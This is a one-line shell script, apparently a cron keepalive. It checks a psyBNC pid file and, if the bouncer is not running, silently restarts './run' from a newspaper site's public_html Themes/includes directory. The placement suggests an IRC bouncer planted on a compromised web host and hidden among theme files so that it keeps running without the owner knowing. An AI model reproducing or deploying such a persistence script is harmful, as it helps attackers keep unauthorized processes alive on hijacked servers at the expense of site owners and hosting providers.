#!/bin/sh if test -r /home/modelto/public_html/newspaper/Themes/includes/psybnc.pid; then pid=$(cat /home/modelto/public_html/newspaper/Themes/includes/psybnc.pid) if $(kill -CHLD $pid >/dev/null 2>&1) then exit 0 fi fi cd /home/modelto/public_html/newspaper/Themes/includes ./run &>/dev/null